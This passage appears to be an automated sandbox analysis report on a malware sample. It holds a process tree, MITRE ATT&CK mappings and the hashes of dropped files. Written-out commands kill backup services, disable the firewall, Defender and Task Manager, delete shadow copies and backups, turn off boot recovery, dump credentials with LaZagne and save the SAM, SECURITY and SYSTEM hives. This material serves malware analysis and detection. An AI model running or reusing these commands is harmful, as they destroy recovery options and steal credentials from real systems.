    taskkill /F /IM QBCFMonitorService*
    3⤵
    - Kills process with taskkill
    PID:1704
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VeeamTransportSvc*
    3⤵
    - Kills process with taskkill
    PID:2224
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VeeamDeploymentService*
    3⤵
    - Kills process with taskkill
    PID:3936
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VeeamNFSSvc*
    3⤵
    - Kills process with taskkill
    PID:3700
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM veeam*
    3⤵
    - Kills process with taskkill
    PID:3664
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM PDVFSService*
    3⤵
    - Kills process with taskkill
    PID:516
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecVSSProvider*
    3⤵
    - Kills process with taskkill
    PID:1820
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecAgentAccelerator*
    3⤵
    - Kills process with taskkill
    PID:4572
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecRPCService*
    3⤵
    - Kills process with taskkill
    PID:3984
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM AcrSch2Svc*
    3⤵
    - Kills process with taskkill
    PID:1356
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM AcronisAgent*
    3⤵
    - Kills process with taskkill
    PID:1432
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM CASAD2DWebSvc*
    3⤵
    - Executes dropped EXE
    - Kills process with taskkill
    PID:764
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM CAARCUpdateSvc*
    3⤵
    - Kills process with taskkill
    PID:3516
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM TeamViewer*
    3⤵
    - Kills process with taskkill
    PID:3248
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c netsh advfirewall set allprofiles state off & netsh advfirewall set currentprofile state off & netsh advfirewall set domainprofile state off & netsh advfirewall set privateprofile state off & netsh advfirewall set publicprofile state off & REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f & powershell -Command Add-MpPreference -ExclusionExtension .exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3768
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:1032
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set currentprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:4908
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set domainprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:4164
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set privateprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:1624
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set publicprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:4292
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    3⤵
    PID:4236
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:3844
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f
    3⤵
    - Modifies registry key
    PID:3444
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5060
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1784
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4768
- C:\Users\Admin\AppData\Roaming\pass.exe
  "C:\Users\Admin\AppData\Roaming\pass.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:4720
- - C:\Windows\SysWOW64\cmd.exe
    "cmd" /c cd %appdata% & laZagne.exe all -oA -output %appdata% & ren credentials*.txt pass.txt
    3⤵
    PID:1812
  - - C:\Users\Admin\AppData\Roaming\LaZagne.exe
      laZagne.exe all -oA -output C:\Users\Admin\AppData\Roaming
      4⤵
      Executes dropped EXE
      PID:3904
    - - C:\Users\Admin\AppData\Roaming\LaZagne.exe
        
        laZagne.exe all -oA -output C:\Users\Admin\AppData\Roaming
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Accesses Microsoft Outlook profiles
        Suspicious behavior: EnumeratesProcesses
        outlook_office_path
        outlook_win_path
        
        PID:2508
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "reg.exe save hklm\sam C:\Users\Admin\AppData\Local\Temp\whxpczkxl"
        6⤵
        
        PID:1600
        
        C:\Windows\system32\reg.exe
        
        reg.exe save hklm\sam C:\Users\Admin\AppData\Local\Temp\whxpczkxl
        7⤵
        
        PID:4252
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "reg.exe save hklm\security C:\Users\Admin\AppData\Local\Temp\jwqzajuwthv"
        6⤵
        
        PID:1120
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "reg.exe save hklm\system C:\Users\Admin\AppData\Local\Temp\bhfzhxz"
        6⤵
        
        PID:4572
- - C:\Windows\SysWOW64\cmd.exe
    "cmd" /c cd %appdata% & del /f credentials* & del /f pass.txt & del /f LaZagne.exe & del /f tool.bin
    3⤵
    PID:740
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1660
- C:\Users\Admin\AppData\Roaming\steal.exe
  "C:\Users\Admin\AppData\Roaming\steal.exe"
  2⤵
  - Executes dropped EXE
  PID:2780
- - C:\Users\Admin\AppData\Roaming\steal.exe
    "C:\Users\Admin\AppData\Roaming\steal.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4144
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:3896
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:5108
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:4216
- C:\Users\Admin\AppData\Roaming\server.exe
  "C:\Users\Admin\AppData\Roaming\server.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:1692
- C:\Users\Admin\AppData\Roaming\discord.exe
  "C:\Users\Admin\AppData\Roaming\discord.exe"
  2⤵
  PID:764

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4468

C:\Windows\system32\reg.exe
reg.exe save hklm\security C:\Users\Admin\AppData\Local\Temp\jwqzajuwthv
1⤵
PID:4080

C:\Windows\system32\reg.exe
reg.exe save hklm\system C:\Users\Admin\AppData\Local\Temp\bhfzhxz
1⤵
PID:4400

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4304

C:\Windows\System32\LogonUI.exe
"C:\Windows\System32\LogonUI.exe"
1⤵
- Executes dropped EXE
PID:3768

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll

Filesize
685KB

MD5
081d9558bbb7adce142da153b2d5577a

SHA1
7d0ad03fbda1c24f883116b940717e596073ae96

SHA256
b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

SHA512
2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\VCRUNTIME140.dll

Filesize
106KB

MD5
49c96cecda5c6c660a107d378fdfc3d4

SHA1
00149b7a66723e3f0310f139489fe172f818ca8e

SHA256
69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc

SHA512
e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\VCRUNTIME140_1.dll

Filesize
48KB

MD5
cf0a1c4776ffe23ada5e570fc36e39fe

SHA1
2050fadecc11550ad9bde0b542bcf87e19d37f1a

SHA256
6fd366a691ed68430bcd0a3de3d8d19a0cb2102952bfc140bbef4354ed082c47

SHA512
d95cd98d22ca048d0fc5bca551c9db13d6fa705f6af120bbbb621cf2b30284bfdc7320d0a819bb26dab1e0a46253cc311a370bed4ef72ecb60c69791ed720168

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\_asyncio.pyd

Filesize
63KB

MD5
511a52bcb0bd19eda7aa980f96723c93

SHA1
b11ab01053b76ebb60ab31049f551e5229e68ddd

SHA256
d1fb700f280e7793e9b0dca33310ef9cd08e9e0ec4f7416854dffaf6f658a394

SHA512
d29750950db2ecbd941012d7fbdd74a2bbd619f1a92616a212acb144da75880ce8a29ec3313acbc419194219b17612b27a1833074bbbaa291cdb95b05f8486ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\_bz2.pyd

Filesize
82KB

MD5
4438affaaa0ca1df5b9b1cdaa0115ec1

SHA1
4eda79eaf3de614d5f744aa9eea5bfcf66e2d386

SHA256
ec91e2b4baca31b992d016b84b70f110ce2b1b2dfd54f5e5bef6270ed7d13b85

SHA512
6992107ac4d2108e477bc81af667b8b8e5439231e7e9f4b15ce4bce1aeea811bc0f1aaa438be3b0e38597760cb504367512809ee1937c4b538a86724ae543ba6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\_cffi_backend.cp311-win_amd64.pyd

Filesize
177KB

MD5
210def84bb2c35115a2b2ac25e3ffd8f

SHA1
0376b275c81c25d4df2be4789c875b31f106bd09

SHA256
59767b0918859beddf28a7d66a50431411ffd940c32b3e8347e6d938b60facdf

SHA512
cd5551eb7afd4645860c7edd7b0abd375ee6e1da934be21a6099879c8ee3812d57f2398cad28fbb6f75bba77471d9b32c96c7c1e9d3b4d26c7fc838745746c7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\_ctypes.pyd

Filesize
120KB

MD5
6114277c6fc040f68d25ca90e25924cd

SHA1
028179c77cb3ba29cd8494049421eaa4900ccd0e

SHA256
f07fe92ce85f7786f96a4d59c6ee5c05fe1db63a1889ba40a67e37069639b656

SHA512
76e8ebefb9ba4ea8dcab8fce50629946af4f2b3f2f43163f75483cfb0a97968478c8aaef1d6a37be85bfc4c91a859deda6da21d3e753daefe084a203d839353d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\_decimal.pyd

Filesize
247KB

MD5
be315973aff9bdeb06629cd90e1a901f

SHA1
151f98d278e1f1308f2be1788c9f3b950ab88242

SHA256
0f9c6cc463611a9b2c692382fe1cdd7a52fea4733ffaf645d433f716f8bbd725

SHA512
8ea715438472e9c174dee5ece3c7d9752c31159e2d5796e5229b1df19f87316579352fc3649373db066dc537adf4869198b70b7d4d1d39ac647da2dd7cfc21e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\_hashlib.pyd

Filesize
63KB

MD5
1524882af71247adecf5815a4e55366a

SHA1
e25014c793c53503bdff9af046140edda329d01b

SHA256
6f7742dfdd371c39048d775f37df3bc2d8d4316c9008e62347b337d64ebed327

SHA512
5b954bb7953f19aa6f7c65ad3f105b77d37077950fb1b50d9d8d337bdd4b95343bac2f4c9fe17a02d1738d1f87eeef73dbbf5cdddcb470588cbc5a63845b188a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\_lzma.pyd

Filesize
155KB

MD5
737119a80303ef4eccaa998d500e7640

SHA1
328c67c6c4d297ac13da725bf24467d8b5e982e3

SHA256
7158c1290ac29169160b3ec94d9c8bcde4012d67a555f325d44b418c54e2cc28

SHA512
1c9920e0841a65b01a0b339c5f5254d1039ef9a16fe0c2484a7e2a9048727f2cc081817aa771b0c574fb8d1a5a49dc39798a3c5e5b5e64392e9c168e1827be7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\_multiprocessing.pyd

Filesize
33KB

MD5
2ca9fe51bf2ee9f56f633110a08b45cd

SHA1
88ba6525c71890a50f07547a5e9ead0754dd85b9

SHA256
1d6f1e7e9f55918967a37cbd744886c2b7ee193c5fb8f948132ba40b17119a81

SHA512
821551fa1a5aa21f76c4ae05f44ddd4c2daa00329439c6dadc861931fa7bd8e464b4441dfe14383f2bb30c2fc2dfb94578927615b089a303aa39240e15e89de5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\_overlapped.pyd

Filesize
49KB

MD5
ac053ef737e4f13b02bfa81f9e46170b

SHA1
5d8ebeb30671b74d736731696fedc78c89da0e1f

SHA256
cb68e10748e2efd86f7495d647a2774cea9f97ad5c6fe179f90dc1c467b9280f

SHA512
6ac26f63981dc5e8dfb675880d6c43648e2bbe6711c75dcac20ebe4d8591e88fbfac3c60660ab28602352760b6f5e1cb587075072abd3333522e3e2549bfa02e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\_queue.pyd

Filesize
31KB

MD5
8bbed19359892f8c95c802c6ad7598e9

SHA1
773fca164965241f63170e7a1f3a8fa17f73ea18

SHA256
4e5b7c653c1b3dc3fd7519e4f39cc8a2fb2746e0ecdc4e433fe6029f5f4d9065

SHA512
22ea7667689a9f049fa34ddae6b858e1af3e646a379d2c5a4aef3e74a4ff1a4109418b363c9be960127f1c7e020aa393a47885bc45517c9e9aebe71ec7cb61a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\_socket.pyd

Filesize
77KB

MD5
64a6c475f59e5c57b3f4dd935f429f09

SHA1
ca2e0719dc32f22163ae0e7b53b2caadb0b9d023

SHA256
d03fa645cde89b4b01f4a2577139fbb7e1392cb91dc26213b3b76419110d8e49

SHA512
cf9e03b7b34cc095fe05c465f9d794319aaa0428fe30ab4ddce14ba78e835edf228d11ec016fd31dfe9f09d84b6f73482fb8e0f574d1fd08943c1ec9e0584973

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\_sqlite3.pyd

Filesize
117KB

MD5
a7df575bf69570944b004dfe150e8caf

SHA1
2fd19be98a07347d59afd78c167601479aac94bb

SHA256
b1223420e475348c0bfb90fae33fc44ce35d988270294158ec366893df221a4b

SHA512
18c381a4ded8d33271cbf0bea75af1c86c6d34cc436f68fb9342951c071c10d84cf9f96a0509c53e5886d47fed5bca113a7f7863f6873583daa7bb6af1aa9afa

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\_ssl.pyd

Filesize
172KB

MD5
a0b40f1f8fc6656c5637eacacf7021f6

SHA1
38813e25ffde1eee0b8154fa34af635186a243c1

SHA256
79d861f0670828dee06c2e3523e2f9a2a90d6c6996bde38201425aa4003119f1

SHA512
c18855d7c0069fff392d422e5b01fc518bbdf497eb3390c0b333ecac2497cd29abbdae4557e4f0c4e90321fba910fc3e4d235ce62b745fa34918f40fa667b713

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\_uuid.pyd

Filesize
24KB

MD5
4faa479423c54d5be2a103b46ecb4d04

SHA1
011f6cdbd3badaa5c969595985a9ad18547dd7ec

SHA256
c2ad3c1b4333bc388b6a22049c89008505c434b1b85bff0823b19ef0cf48065a

SHA512
92d35824c30667af606bba883bf6e275f2a8b5cbfea2e84a77e256d122b91b3ee7e84d9f4e2a4946e903a11293af9648a45e8cfbe247cbdc3bcdea92eb5349c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\base_library.zip

Filesize
704KB

MD5
7a6e7a97442bbbbca2771bf3570f4152

SHA1
c50dacaa22fe05e5bf0d2adc845a9f0cd7613505

SHA256
82291385ac684160c583eae951f2f662fd5be71f67ecda7524f86fcab11e9614

SHA512
bb9d1c535364850024ddec8fef4fe13b85f304b26127527266e0958662607b61bccc8eda4d5ffcc0bf5e3865a2b0825215511e599a0dd59454f335d00321c260

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\libcrypto-3.dll

Filesize
4.8MB

MD5
ff1970154bc891276ab6865156e555a2

SHA1
974cb84d548f53dbaa2864f3f4c017360e209da7

SHA256
9321931abe602f47ab1f82f300040a2320ecfbdc8e592584392f65ede5faa57b

SHA512
4d6b2e6fdca7ddadd885048c8be54ad32a29e0e6b4f16463176725c151cd800236fe91694835330a6e5d160b19377214be7731152e7de8b2cb80fec8b1d59c59

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\libffi-8.dll

Filesize
38KB

MD5
0f8e4992ca92baaf54cc0b43aaccce21

SHA1
c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

SHA256
eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

SHA512
6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\libssl-3.dll

Filesize
771KB

MD5
64acb046fe68d64ee475e19f67253a3c

SHA1
d9e66c9437ce6f775189d6fdbd171635193ec4cc

SHA256
b21309abd3dbbb1bf8fb6aa3c250fc85d7b0d9984bf4c942d1d4421502f31a10

SHA512
f8b583981df528cf4f1854b94eff6f51dd9d4be91e6fa6329a8c4435b705457c868ae40ee030fa54bebb646a37b547bc182c9cbf0df9a07fea03a18cf85c6766

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\pyexpat.pyd

Filesize
194KB

MD5
cdcf0e74a32ad7dfeda859a0ce4fcb20

SHA1
c72b42a59ba5d83e8d481c6f05b917871b415f25

SHA256
91fe5b1b2de2847946e5b3f060678971d8127dfd7d2d37603fdcd31bd5c71197

SHA512
c26fdf57299b2c6085f1166b49bd9608d2dd8bc804034ebb03fb2bba6337206b6018bf7f74c069493ffae42f2e9d6337f6f7df5306b80b63c8c3a386bce69ea6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\python311.dll

Filesize
768KB

MD5
d685e3b35e2f43f91bddd51bffd39fe9

SHA1
300e041bf027dc9ac5403dd2fe6fac1c564ec5a8

SHA256
71a89943e3ddebcd70701bc24530724ca6066bc636a0517abe1589e6a7a2f748

SHA512
152071c43e2c2f339ade48ee9b9e8bdd285245c8cdd235bf158651749ddf74e3e720f6b0eabb2087cb8ec8bdddd5455af971939c77db74e938b442da0567dd2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\pywin32_system32\pythoncom311.dll

Filesize
654KB

MD5
f98264f2dacfc8e299391ed1180ab493

SHA1
849551b6d9142bf983e816fef4c05e639d2c1018

SHA256
0fe49ec1143a0efe168809c9d48fe3e857e2ac39b19db3fd8718c56a4056696b

SHA512
6bb3dbd9f4d3e6b7bd294f3cb8b2ef4c29b9eff85c0cfd5e2d2465be909014a7b2ecd3dc06265b1b58196892bb04d3e6b0aa4b2ccbf3a716e0ff950eb28db11c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\pywin32_system32\pywintypes311.dll

Filesize
131KB

MD5
90b786dc6795d8ad0870e290349b5b52

SHA1
592c54e67cf5d2d884339e7a8d7a21e003e6482f

SHA256
89f2a5c6be1e70b3d895318fdd618506b8c0e9a63b6a1a4055dff4abdc89f18a

SHA512
c6e1dbf25d260c723a26c88ec027d40d47f5e28fc9eb2dbc72a88813a1d05c7f75616b31836b68b87df45c65eef6f3eaed2a9f9767f9e2f12c45f672c2116e72

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\select.pyd

Filesize
29KB

MD5
653bdccb7af2aa9ccf50cb050fd3be64

SHA1
afe0a85425ae911694c250ab4cb1f6c3d3f2cc69

SHA256
e24a3e7885df9a18c29ba058c49c3adcf59e4b58107847b98eca365b6d94f279

SHA512
07e841fda7a2295380bfa05db7a4699f18c6e639da91d8ee2d126d4f96e4cddaedbd490deb4d2a2e8e5877edfff877693f67a9dc487e29742943e062d7be6277

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\sqlite3.dll

Filesize
1.4MB

MD5
b49b8fde59ee4e8178c4d02404d06ee7

SHA1
1816fc83155d01351e191d583c68e722928cce40

SHA256
1afd7f650596ad97fcf358b0e077121111641c38ca9d53132bab4c9588cf262f

SHA512
a033ce87c2e503b386fb92aa79a7ec14d6c96e4a35d0cb76d4989bacd16f44c4ed5ac4e13057f05f9d199a3fd8545b9a25296515ec456f29c464d949ff34942a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\unicodedata.pyd

Filesize
1.1MB

MD5
1905b5d0f945499441e8cd58eb123d86

SHA1
117e584e6fcc0e8cfc8e24e3af527999f14bac30

SHA256
b1788b81fa160e5120451f9252c7745cdde98b8ce59bf273a3dd867bb034c532

SHA512
ed88cd7e3259239a0c8d42d95fa2447fc454a944c849fa97449ad88871236fefdafe21dbfa6e9b5d8a54ddf1d5281ec34d314cb93d47ce7b13912a69d284f522

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI27802\win32\win32api.pyd

Filesize
130KB

MD5
1d6762b494dc9e60ca95f7238ae1fb14

SHA1
aa0397d96a0ed41b2f03352049dafe040d59ad5d

SHA256
fae5323e2119a8f678055f4244177b5806c7b6b171b1945168f685631b913664

SHA512
0b561f651161a34c37ff8d115f154c52202f573d049681f8cdd7bba2e966bb8203780c19ba824b4a693ef12ef1eeef6aeeef96eb369e4b6129f1deb6b26aaa00

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wxghx4rh.3vt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\crcook.txt

Filesize
18B

MD5
b9e8157d18b9bede4d2acc18dfe72a8a

SHA1
c616a2da76b6004ee5c2b4313295e741b6ebd2ae

SHA256
0c93b35e13c256b28d5920492713000412e88ce011f51fe7908c7e3260bea60b

SHA512
16b18f19ed677891e58f921bbd3de4dcabdf2f818bef3cd53ea0b5ba98ee6a255fea35e625e7d1b39c83df4638c29898fbc05e1b780cf671a033fc4eeef5eceb

Download Submit
C:\Users\Admin\AppData\Local\Temp\gyryyklyl

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Temp\tqutnbupz

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Roaming\boot.bin

Filesize
512B

MD5
96885376afb5fc98df615e77fbde771a

SHA1
6c067f49511b3d7b622985fa5f62fe9295446e9e

SHA256
75ebfeffa751168e3ecb99133949b189a2a7e84ebbff856251751a805adbc9c7

SHA512
777815172fa421b15d5f4e64856d358354035407e340bcd9675c815b068c7a3f2b7c5ba1f1d351d497b53c4381dbef1ce4f4a586339042f171cdba1277932bbc

Download Submit
C:\Users\Admin\AppData\Roaming\discord.exe

Filesize
448KB

MD5
1843f1682e1a0406ccfd1c55c5bda971

SHA1
079e97f5d20ec40066754e991556c82a06655d7f

SHA256
8443dd6bc8a8fd659806122f33ef3d346a29d95f42d3a6095bdd19042f2c0131

SHA512
7ff3aa929577eff469c91e98ffd3d27c0cc91792208b1ab51709f262ca5aa02f91fe54c28f8035b8f8123a3e03a200ca4dbba6d8a98b72cdcc6c00f9deb74c51

Download Submit
C:\Users\Admin\AppData\Roaming\discord.exe

Filesize
64KB

MD5
f2e95cae49ed238cba5bb1ac75b219f1

SHA1
e5233cd245804288ef52537bf91855de3281ddcf

SHA256
62712d980ddf3ef0e0d94de0ec959f87a101dd10f619409007d851f93787eb08

SHA512
0cd20d44e9c290c2413dfb557141f8be3b811acc620b79539659c0f1ea4bd2dbff331618ff8000c9ce23299bb6f7497fece43988b9df73c0cc3123219cd74241

Download Submit
C:\Users\Admin\AppData\Roaming\lm.exe

Filesize
39KB

MD5
86e3192ad129a388e4f0ac864e84df78

SHA1
70a2b1422b583c2d768a6f816905bc85687ced52

SHA256
4f2e651cb369aba3027c03e3d9aa2237af80ca6d03982d9c03a34cd1410c87d3

SHA512
f57b6edf4a0ab9bdb5989f82383b7fb236bba6931273f436cb622fdd91bf439b238ca5b5a72a9be3a13b564bc8199601c5d8e470d9766c0b6136df9c6c33d05b

Download Submit
C:\Users\Admin\AppData\Roaming\mbr.exe

Filesize
101KB

MD5
00e306f18b8cc56f347f34a7ebaf7f9f

SHA1
2bd080cc517e906942f3f7fcb4b88ec1653ef5bc

SHA256
ce58d6b982fdab53ac494a6746815a858d9c321df0f4696497176cbda093df9e

SHA512
2204afb1a3c3577df6f83b5600a5b0e278ea8fa88226477500169c843d1480ed6d17d6771382808213d98c475534f02c3845850b0465c175efae27ab1232940d

Download Submit
C:\Users\Admin\AppData\Roaming\pass.exe

Filesize
4.9MB

MD5
e933134f085ffb25da3941a341edbed9

SHA1
d1d0c09be760ff8509eceb191d51879421fbdf0c

SHA256
62c5b0c576f2f21f15ed789ce556ca88b03e80b0104af21bf0f1a0896a8f3687

SHA512
d50e75c9a07da6862dbff5a041102362af995e3aaeda40d194217dabe3a221d6888c5b59628e6c073691a0701de88ca44f81ceda7599631c3245693305f673c0

Download Submit
C:\Users\Admin\AppData\Roaming\pass.exe

Filesize
4.1MB

MD5
036c8ac4cf199c84c3b4652e58220d3e

SHA1
abd2eb7394c6654b8ddc4a2dee02325ef63bfccf

SHA256
6425794ac2cf150787b55f850e7c0156122ae6338f7645268c2279afe1950c8d

SHA512
e42dd3a2d921a82ed267ba7379524a18153fb7272674497af334930ed83076ff3f634908121ed916a4e687c844458fb519a3ea0ace9d49f36e2884e8ecb24284

Download Submit
C:\Users\Admin\AppData\Roaming\pass.exe

Filesize
1.3MB

MD5
636bbda54e7916e6f16332be0dd3e5c7

SHA1
9530e9de9f9a6b9ea187e63634a17296a3451851

SHA256
0eb967a5c113a3313b7e56c36c128b8091f01ebb258d581942059585edc022c1

SHA512
0bf34b5942739a57e1f7512d2fd96e6a5163dc8e8bded10e9092ccd828fd40dbfcdbe7de4c3d74321593e4d47b33b1f74b440135e87baed93b16786c621b4141

Download Submit
C:\Users\Admin\AppData\Roaming\server.exe

Filesize
512KB

MD5
5b41bfb5089331d584080f630b363f04

SHA1
104fe9eb8e46a5f98e2a88346b11ba3a9917447c

SHA256
89a1ea2820b58c3893d038de1572ac21dbf525894241db1a3f1a69b8bcdaaf69

SHA512
